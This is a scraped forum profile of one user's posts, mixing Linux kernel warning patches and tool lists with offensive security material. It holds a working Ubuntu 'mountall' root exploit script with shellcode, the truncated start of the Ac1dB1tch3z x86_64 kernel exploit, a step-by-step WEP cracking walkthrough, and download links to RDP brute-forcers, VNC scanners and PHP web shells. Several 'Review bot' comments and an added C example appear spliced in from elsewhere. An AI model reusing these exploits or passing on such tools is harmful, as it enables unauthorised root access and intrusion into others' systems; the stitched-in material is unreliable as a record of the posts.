Everything posted by Nytro
-
Wikipedia: "PaX is a patch for the Linux kernel that implements least privilege protections for memory pages. The least-privilege approach allows computer programs to do only what they have to do in order to be able to execute properly, and nothing more. PaX was first released in 2000."
-
You are weak; with a Nokia 3310 you can sniff phone calls and record them.
-
Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability

#!/bin/sh
# by fuzz. For Anux inc.
#
# ubuntu 10.04 , 10.10

if [ -z "$1" ]
then
    echo "usage: $0 <UDEV KERNEL EVENT>"
    echo "see here http://www.reactivated.net/writing_udev_rules.html"
    exit
fi

cat > usn985-exploit.sh << EOF
#!/bin/sh
chown root:root $PWD/usn985-sc
chmod +s $PWD/usn985-sc
EOF

cat > usn985-sc.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){int *r;*((int *)&r+2)=(int)s;}
EOF

gcc usn985-sc.c -o usn985-sc
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn985-exploit.sh

echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"
echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"

Vulnerable: Ubuntu Ubuntu Linux 10.04 LTS
Not Vulnerable: Ubuntu mountall 2.15.2

Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability
[I]Ubuntu Linux is prone to a local privilege-escalation vulnerability that affects the 'mountall' package. Local attackers can exploit this issue to execute arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer. Ubuntu 10.04 LTS is vulnerable; other versions may also be affected.[/I]

Update: http://security.ubuntu.com/ubuntu/pool/main/m/mountall/mountall_2.15.2_i386.deb

Give it a try, those of you on Ubuntu.
-
This seems like a big piece of nonsense to me. 1) $ipLog="cookies.html"; - The data is saved in an HTML file, which means a possible XSS (well, not very useful, but who knows). 2) $cookie = $HTTP_GET_VARS["c"]; - That is not a cookie. Yes, it saves some data, but that's about it; cookie, my foot. And it can be done more elegantly: use php_gd and generate a PNG image, so that nobody will (not necessarily) be able to tell it's a PHP script.
-
Not here. Trashed.
-
[PATCH] /drivers/acpi/acpica/nsrepair.c (2.6.34.7) - Fixed useless compile warning

Warning: drivers/acpi/acpica/nsrepair.c: In function ‘acpi_ns_repair_object’: drivers/acpi/acpica/nsrepair.c:125:29: warning: ‘new_object’ may be used uninitialized in this function

Patch: --- a/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:35:56.568006487 +0300 +++ b/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:00:40.000000000 +0300 @@ -122,7 +122,7 @@ acpi_ns_repair_object(struct acpi_predef union acpi_operand_object **return_object_ptr) { union acpi_operand_object *return_object = *return_object_ptr; - union acpi_operand_object *new_object; + union acpi_operand_object *new_object = NULL; acpi_status status; ACPI_FUNCTION_NAME(ns_repair_object);
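Review bot: the `= NULL` initializer on `new_object` silences -Wmaybe-uninitialized, but the message never says whether acpi_ns_repair_object can actually reach the read at line 125 without assigning `new_object`; if it cannot, state that the warning is a false positive so reviewers know no behaviour changes, and if it can, a NULL dereference merely replaces a garbage pointer and the real fix is the missing assignment. Note also that the `---` side (08:35:56) is newer than the `+++` side (08:00:40), which is the signature of passing the modified file to diff first; the hunk body reads in the right direction here, but regenerate with the original tree as `a/` so the headers and the hunk agree.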
-
ISO/IEC DTR 19769 (August 21, 2010) Working Draft, Standard for Programming Language C++ Download: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3126.pdf Interesting, and it has only 1331 pages (they could have added another 6 with pictures).
-
Open Source File Archivers for Linux
Posted by jun auza On 9/16/2010

A computer program that merges a number of files together into one archive file, or a series of archive files, for simpler transportation, storage, or backup is called a file archiver. Archiving or packing refers to the process of making an archive file, while unarchiving, unpacking or extracting means reconstructing the original files from the archive. The simplest file archivers just gather a list of files and concatenate their contents sequentially into the archive. For transferring a large number of individual files over a high latency network like the Internet, numerous file archivers employ archive formats that provide lossless data compression to reduce the size of the archive.

If you are looking for a capable free and open-source file archiver for Linux, you should check out this list, and then pick out the one that would suit your needs:

Xarchiver
Xarchiver is a popular GTK+2 based file archiver that is designed to be independent of the desktop environment. It is utilized in a good number of lightweight Linux distributions like Xfce and LXDE. Xarchiver supports 7-zip, arj, bzip2, gzip, rar, lha, lzma, lzop, deb, rpm, tar and zip archives, archive navigation with mimetype icons, archive comment ability and archive listing as HTML or txt. Cut/Copy/Paste/Rename actions within files of a variety of archives are also supported. Password detection and protection is automatic for arj, zip and rar files.

File Roller
File Roller is a simple and easy-to-use archive manager for the GNOME desktop environment. It has a graphical user interface and can create and modify archives, view the content of an archive and files contained in the archive, and of course extract files from the archive. It supports plenty of archive files such as 7-Zip (.7z), Tar, WinAce (.ace), gzip, RAR, and a whole lot more.

Ark
Ark is an archiving tool for the KDE desktop environment that is included in the kdeutils package. It can view, extract, create, and modify archives through its intuitive GUI. Ark can handle different file formats that include tar, gzip, bzip2, zip, rar and lha. If the appropriate plugin from the kdeaddons package is installed, it can be integrated into Konqueror in the KDE environment to handle archives through KParts technology.

PeaZip
PeaZip is both a file manager and file archiver that supports its native PEA archive format, featuring compression, multi volume split and flexible authenticated encryption, and integrity check schemes. It also has support for other mainstream formats, with special focus on handling open formats. With PeaZip, users can run extracting and archiving operations automatically using a command line generated by exporting the job defined in the GUI front-end. For speeding up the definition of an archiving or backup operation, it can also create, edit and restore an archive's layout.

FreeArc
FreeArc is a fast and efficient file archiver that is said to work 2–5 times quicker than the best programs in each compression class (ccm, 7-zip, rar, uharc -mz, pkzip) while retaining the same compression ratio. On technical grounds, it is superior to any existing practical compressor. Features include:
* AES/Blowfish/Twofish/Serpent encryption
* FAR and Total Commander plugins
* Solid compression with smart updates
* Ability to create self-extracting archives and installers
* Archive protection and recovery
-
Liviu Guta, Florin Peste and Play AJ - Sambata, duminica :->
-
The idea is simple. I don't care whether it's infected or not. If you're smart guys, you run it in a virtual machine. If you're even smarter, you don't download it, so you don't run it.
-
Hmm, stupid kid stuff. http://www.virustotal.com/file-scan/report.html?id=28d0e945f0648bed7b7b2a2139f2b9bf1901feec39ff4f6c0315fa58e054f44e-1283279679 It's detected as HACKTOOL, that is, not as TROJAN or whatever else your mother shoves up your ass. Ban. So that all the losers like the one above get it. There are also programs that do not steal Firefox passwords (PSW.Stealer) or allow remote control of your computer (Backdoor, RAT, Trojan) or the like, but which ARE DETECTED. That doesn't necessarily mean they crap in your computer. I'm not going to check every program I post to see whether it's infected; nobody is going to do that. Scan it on VirusTotal and see for yourselves what exactly a program is detected as. Or better yet, check yourselves whether the program is infected and that's that; stop coming here with "it's infected" or other nonsense.
-
These are the Top 20 Hacking Tools; the list is not exhaustive, these are a few to name.

Nessus
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

Snort
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Netcat
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using the TCP or UDP protocol.

TCPdump
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.

Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

Dsniff
Dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate, alerting you to security vulnerabilities.

Ettercap
Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.

Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.

John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix.

OpenSSH
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

TripWire
Tripwire is a tool that can be used for data and program integrity assurance.

Kismet
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.

NetFilter
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packet mangling.

IP Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

pf
OpenBSD Packet Filter

fport
fport identifies all open TCP/IP and UDP ports and maps them to the owning application.

SAINT
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

OpenPGP
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

Source: Top 20 Hacking Tools | Hacking Truths
-
I think this one is without a password: Download RDP Brute v.0.6.rar from Sendspace.com - send big files the easy way
-
CRACK WIFI – Simple WEP Crack

Overview
To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Equipment used
Wifi Adaptor: Alfa AWUS036H (available on eBay & Amazon)
Software: Backtrack 4 (free download from BackTrack Linux - Penetration Testing Distribution)

Step 1 – Start the wireless interface in monitor mode on the AP channel
airmon-ng start wlan1 6
starts the wifi interface on channel 6

Step 2 – Test wireless device packet injection
aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs
airodump-ng -c 6 --bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.

Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E "(RA:|Authentication|ssoc)"
You would then look for error messages.
If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and…
Run: "tcpdump -n -e -s0 -vvv -i wlan1"
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets. If you want to select only the DeAuth packets with tcpdump then you can use: "tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth". You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode
aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key
aircrack-ng -b 00:1B:11:24:27:2E output*.cap

All Done!
Source: Crack Wifi | Hacking Articles
-
RDP Scanner [bruteForce]

I haven't tried it, I don't know if it's infected.

RDP Brutus, based on all known tss Brutus.
* Select the type of IP scan: one specified range, or straight from a list of ranges.
* Thread option for the scanner, the ability to change the port for the scan
* Thread settings for Brutus (how many IPs will be checked on a separate thread)
* Ability to scan without Brutus
* Brutus: a list of usernames against a list of passwords
* Works anywhere on the disk (including Russian paths)
* Avtosvorachivanie windows Brutus
* Edit the list of usernames and passwords directly from the program
* Output sbruchennyh grandparents in a separate window by pressing the button at any time (even during the Brut)
* Sending Hoods to your ICQ number (master Ween - i.e. only the number that you want to send to - you can specify in the preferences)

Howto: http://www.file-upload.net/download-2791486/h4cky0u.txt.html
Download: http://www.sendspace.com/file/tv1whv
Source: h4cky0u
-
I haven't tried them, I don't know if they're infected...

The scanner runs through a file with the extension .bat, or as many call it a "batnik", which contains lines like:
vnc.exe -I 88.158.0.0-88,158,255,255 -P 3389 -cT -T 2900
where
vnc.exe - the name of the scanner
88.158.0.0-88.158.255.255 - scanning range
3389 - the port on which the range is scanned
2900 - number of threads

The scanned list is saved in a file VNC_bypauth.txt, and the resulting list looks like this:
----------------------------------------------------------------------------
COMMAND: vnc.exe -I 88.158.0.0-88,158,255,255 -P 3389 -cT -T 2900
----------------------------------------------------------------------------
88.158.1.66 :3389
88.158.1.186 :3389
88.158.1.222 :3389
88.158.5.2 :3389
88.158.5.22 :3389
88.158.6.14 :3389
88.158.6.22 :3389
88.158.9.26 :3389
88.158.9.54 :3389
88.158.9.78 :3389
88.158.9.166 :3389
88.158.9.182 :3389
88.158.9.194 :3389
88.158.10.34 :3389
88.158.11.18 :3389
88.158.12.42 :3389
88.158.12.46 :3389

Of course, you can remove everything unnecessary by hand, but there is also another batnik, which removes all the rubbish and keeps in the file result_ip.txt only the IP addresses with port 3389 open. The batnik itself:
del result_ip.txt
Findstr /C:": 3389" VNC_bypauth.txt>vnc1.txt
FOR /F "eol = tokens = number 1 delims =:" %%I in (vnc1.txt) do @ echo%%I>>result_ip.txt
del vnc1.txt
The archive with the two batniks and the scanner can be downloaded from the attachment.

The second version of the scanner, but with a GUI shell.
VNC-Scanner GUI
For fans of the VNC scanner: a convenient GUI with the scanner packed inside, built-in ranges for scanning, which can be unpacked at any time, a parser, low weight (162 kb) and, on top of all this, source code in Delphi -> you can add your own functions or anything else.
http://www.proxy-base.org/attachments/f20/1015d1267652722-vnc_scanner-vnc_scanner_gui.zip
http://www.proxy-base.org/attachments/f20/1057d1268594784-vnc_scanner-vnc_scanner.rar

VNC-Scanner GUI v.1.1
Added:
- Ability to scan the specified ranges.
http://www.proxy-base.org/attachments/f20/1088d1269698414-vnc_scanner-vnc_scanner_gui_v.1.1.zip

VNC-Scanner GUI v.1.2
http://www.proxy-base.org/attachments/f20/1252d1271586730-vnc_scanner-vnc_scanner_gui.rar
-
SQL Injection and XSS Tools

I haven't downloaded them, haven't tried them, etc.

Apache Hacking TooLz Directory:
Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script

Remote File Inclusion And Remote Command Execution Directory:
IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter

Databases & SQL Injection & XSS TooLz Directory:
Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL

PHP Shells **** v2.0
c99shell #16
Backdoor php v0.1
r57shell
ajan
casus15
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
phpRemoteView

Download: http://rapidshare.com/files/132986898/SQL_InjecTion___XSS_TooLz.rar
-
[PATCH] drivers/block/cciss.c (2.6.34.7): Fixed useless compile warning

Much the same: an array is initialized in an else branch and in theory can be used uninitialized; in practice that doesn't happen, but the compiler has no way of knowing it. Just a simple initialization with 0. These ugly warnings will no longer appear:

drivers/block/cciss.c: In function ‘dev_show_unique_id’:
drivers/block/cciss.c:564:7: warning: ‘sn[0]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[1]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[2]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[3]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[4]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[5]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[6]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[7]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[8]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[9]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[10]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[11]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[12]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[13]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[14]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[15]’ may be used uninitialized in this function

Patch: --- a/drivers/block/cciss.c 2010-09-17 20:17:49.844010958 +0300 +++ b/drivers/block/cciss.c 2010-09-13 19:54:58.000000000 +0300 
@@ -561,7 +561,7 @@ static ssize_t dev_show_unique_id(struct { drive_info_struct *drv = to_drv(dev); struct ctlr_info *h = to_hba(drv->dev.parent); + __u8 sn[16]; - __u8 sn[16] = {0}; unsigned long flags; int ret = 0;

Edit: This one was inverted; I had modified the original file to see whether the error still showed up, and + and - ended up swapped.
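Review bot: the hunk is inverted relative to the stated intent: it adds `__u8 sn[16];` and removes `__u8 sn[16] = {0};`, so applying it would strip the zero initialization rather than introduce it, and the `+` line precedes the `-` line, an order a unified diff never emits. The edit note confirms the swap, and the file headers show how it happened: the `a/` side is dated 2010-09-17 and the `b/` side 2010-09-13, i.e. the modified file was given to diff first. Regenerate with the original tree as `a/` and the modified tree as `b/` so the hunk reads `-  __u8 sn[16];` / `+  __u8 sn[16] = {0};`, and add a one-line justification (which else branch leaves `sn` unset and why the later read at line 564 cannot see that path) so the maintainer can tell a false positive from a real uninitialized read.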
-
I'm glad to see there are people interested in these things too. I like this activity. I sent another one, but I didn't know exactly to whom, so I sent it to "trivial".

[PATCH] /init/main.c (2.6.34.7) Fixed useless compile warning From: Ionut Gabriel Popescu <*******@yahoo.com> First of all, I am really sorry, I didn't know where to send this, I didn't know who is the maintainer of that (/init) section. This is not practically a bug, but the compiler can't be sure about that. The calltime structure is initialized in the first if and it is used in the same `if` condition further down, but the compiler doesn't know that it is the same condition, that it is always the same, and throws this warning: init/main.c: In function ‘do_one_initcall’: init/main.c:722:10: warning: ‘calltime.tv64’ may be used uninitialized in this function And this is ugly. It is very easy to fix it, just initialize the calltime structure with 0. It isn't necessary, but the compiler won't throw that ugly warning anymore. I am sorry for sending this to you, can you send it where it would be correct please? Thanks. Patch: Signed-off-by: Ionut Gabriel Popescu <*******@yahoo.com> --- --- a/init/main.c 2010-09-17 10:37:25.496004183 +0300 +++ b/init/main.c 2010-09-13 19:54:58.000000000 +0300 @@ -719,7 +719,7 @@ static struct boot_trace_ret ret; int do_one_initcall(initcall_t fn) { int count = preempt_count(); - ktime_t calltime = {0}, delta, rettime; + ktime_t calltime, delta, rettime; if (initcall_debug) { call.caller = task_pid_nr(current);

Let's see whether it gets fixed. Usually it takes about 2 weeks until they show up, from what I understand. Well, the security ones are fixed within a few hours at most.
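Review bot: this hunk does the opposite of what the message says: the `-` line carries `ktime_t calltime = {0}, delta, rettime;` and the `+` line carries `ktime_t calltime, delta, rettime;`, so against a mainline tree it fails to apply (the `-` line does not exist there) and against a tree that already has the initializer it removes it. The file headers give it away: `a/init/main.c` is dated 2010-09-17 and `b/init/main.c` 2010-09-13, so the modified file was passed to diff first. Regenerate with the original as `a/` and the modified file as `b/`. In the changelog, replace "this is not practically a bug" with the concrete reason the read is safe: `calltime` is written and read under the same `initcall_debug` test, and the only way the second test could differ is if the initcall itself changed the flag, which is what the compiler cannot rule out; saying so lets the maintainer judge whether a `{0}` store on every initcall is the right trade-off.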
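The post explains the warning in prose; the following is an added, stand-alone C example written for this page (not code from the post and not from init/main.c) that reproduces the pattern behind it and the effect of the zero initializer. Assumed names: `trace_calls` stands in for the kernel's global `initcall_debug` flag, `ktime_like_t` for `ktime_t`, and `fake_ktime_get` is a constructed counter clock so the results are deterministic. The second initcall, which flips the flag while it runs, models the case the compiler is actually worried about.

```c
#include <stdint.h>

/* Stand-in for the kernel's ktime_t (a 64-bit value behind tv64),
 * declared here so the example builds outside the kernel tree. */
typedef struct { int64_t tv64; } ktime_like_t;

/* Plays the role of the kernel's global `initcall_debug` flag. Because it is
 * a global, the compiler must assume the initcall being timed could change
 * it, which is why it cannot match the two `if (trace_calls)` tests below. */
int trace_calls = 0;

/* Constructed clock: a counter that advances by one on every read, so the
 * elapsed time of a traced call is deterministic. */
int64_t fake_clock = 0;
static int64_t fake_ktime_get(void) { return ++fake_clock; }

/* Two initcalls to time: a harmless one, and one that switches tracing on
 * while it runs, modelling the case the warning is about. */
int sample_initcall(void) { return 0; }
int flag_flipping_initcall(void) { trace_calls = 1; return 0; }

/* Shape of do_one_initcall() before the patch: calltime is written only when
 * trace_calls is set on entry and read only when it is set on exit. For a
 * well-behaved fn those agree and nothing is read uninitialized, but the
 * compiler cannot prove it, hence "'calltime.tv64' may be used uninitialized".
 * Returns the elapsed ticks when tracing, -1 when not. */
int64_t timed_call(int (*fn)(void))
{
    ktime_like_t calltime, rettime;
    int64_t delta = -1;

    if (trace_calls)
        calltime.tv64 = fake_ktime_get();

    fn();

    if (trace_calls) {
        rettime.tv64 = fake_ktime_get();
        delta = rettime.tv64 - calltime.tv64;  /* the read the warning points at */
    }
    return delta;
}

/* The patch's remedy: a zero initializer gives calltime a defined value on
 * every path, so the diagnostic goes away and normal behaviour is unchanged.
 * With flag_flipping_initcall the unpatched version above would read an
 * indeterminate value here; this one returns the (meaningless but defined)
 * absolute clock reading instead. */
int64_t timed_call_fixed(int (*fn)(void))
{
    ktime_like_t calltime = {0}, rettime;
    int64_t delta = -1;

    if (trace_calls)
        calltime.tv64 = fake_ktime_get();

    fn();

    if (trace_calls) {
        rettime.tv64 = fake_ktime_get();
        delta = rettime.tv64 - calltime.tv64;
    }
    return delta;
}
```

Compile both functions with `-O2 -Wall` to see which one the compiler complains about; the point of the flag-flipping initcall is that the warning is not purely cosmetic: the zero initializer is what turns a latent read of an indeterminate value into a defined one.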
-
x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation
Nytro replied to Nytro's topic in Exploituri
Nothing about it seems strange to me, or I didn't understand what you mean. First the headers are included, then 2 function types are defined, then the functions it uses, then main. -
Linux Kernel 2.6.27+ x86_64 compat exploit /* Ac1dB1tch3z Vs Linux Kernel x86_64 0day Today is a sad day.. R.I.P. Tue, 29 Apr 2008 / Tue, 7 Sep 2010 a bit of history: MCAST_MSFILTER Compat mode bug found... upon commit! (2 year life on this one) author David L Stevens <dlstevens () us ibm com> Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700) committer David S. Miller <davem () davemloft net> Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700) This patch adds support for getsockopt for MCAST_MSFILTER for both IPv4 and IPv6. It depends on the previous setsockopt patch, and uses the same method. Signed-off-by: David L Stevens <dlstevens () us ibm com> Signed-off-by: YOSHIFUJI Hideaki <yoshfuji () linux-ipv6 org> Signed-off-by: David S. Miller <davem () davemloft net> ------------------------------------------------------------ Thank you for signing-off on this one guys. This exploit has been tested very thoroughly over the course of the past few years on many many targets. Thanks to redhat for being nice enough to backport it into early kernel versions (anything from later August 2008+) Ac1dB1tch3z would like to say F*** YOU Ben Hawkes. You are a new hero! You saved the plan8 man. Just a bit too l8. PS: OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. 
(same thing right */ #include <poll.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <stdlib.h> #include <sys/wait.h> #include <sys/utsname.h> #include <sys/socket.h> #include <sched.h> #include <netinet/in.h> #include <stdio.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/msg.h> #include <errno.h> #ifndef __i386__ #error "r34d th3 c0d3 m0r0n!!# () #" #else #define _GNU_SOURCE #define __dgdhdytrg55 unsigned int #define __yyrhdgdtfs66ytgetrfd unsigned long long #define __dhdyetgdfstreg__ memcpy #define VERT "\033[32m" #define NORM "\033[0m" #define BANNER VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n" #define KALLSYMS "/proc/kallsyms" #define TMAGIC_66TDFDRTS "/proc/timer_list" #define SELINUX_PATH "/selinux/enforce" #define RW_FOPS "timer_list_fops" #define PER_C_DHHDYDGTREM7765 "per_cpu__current_task" #define PREPARE_GGDTSGFSRFSD "prepare_creds" #define OVERRIDE_GGDTSGFSRFSD "override_creds" #define REVERT_DHDGTRRTEFDTD "revert_creds" #define Y0Y0SMAP 0x100000UL #define Y0Y0CMAP 0x200000UL #define Y0Y0STOP (Y0Y0SMAP+0xFFC) #define J0J0S 0x00200000UL #define J0J0R00T 0x002000F0UL #define PAGE_SIZE 0x1000 #define KERN_DHHDYTMLADSFPYT 0x1 #define KERN_DGGDYDTEGGETFDRLAK 0x2 #define KERN_HHSYPPLORQTWGFD 0x4 #define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8 #define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10 #define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20 #define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40 #define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5")) #define TRY_REMAP_DEFAULT 1 #define __gggdfstsgdt_dddex(f, a...) 
do { fprintf(stdout, f, ## a); } while(0) #define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0) #define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0) #define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0) static char buffer[1024]; static int s; static int flags=0; volatile static socklen_t magiclen=0; static int useidt=0, usefops=0, uselsm=0; static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0}; static __dgdhdytrg55 _m_cpu_off=0; static char krelease[64]; static char kversion[128]; #define R0C_0FF 14 static char ttrg0ccc[]= "\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41" "\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c" "\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11" "\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02" "\xeb\xcc\x5e\x5b\x5f\x59\xc3"; #define R0YTTTTUHLFSTT_OFF1 5 #define R0YGGSFDARTDF_DHDYTEGRDFD_D 21 #define R0TDGFSRSLLSJ_SHSYSTGD 45 char r1ngrrrrrrr[]= "\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3" "\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42" "\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7" "\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43" "\xff\xd3\x5f\x5f\x5a\x5b\xc3"; #define RJMPDDTGR_OFF 13 #define RJMPDDTGR_DHDYTGSCAVSF 7 #define RJMPDDTGR_GDTDGTSFRDFT 25 static char ttrfd0[]= "\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0" "\x58\x5f" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xc3"; /* implement selinux bypass for IDT ! 
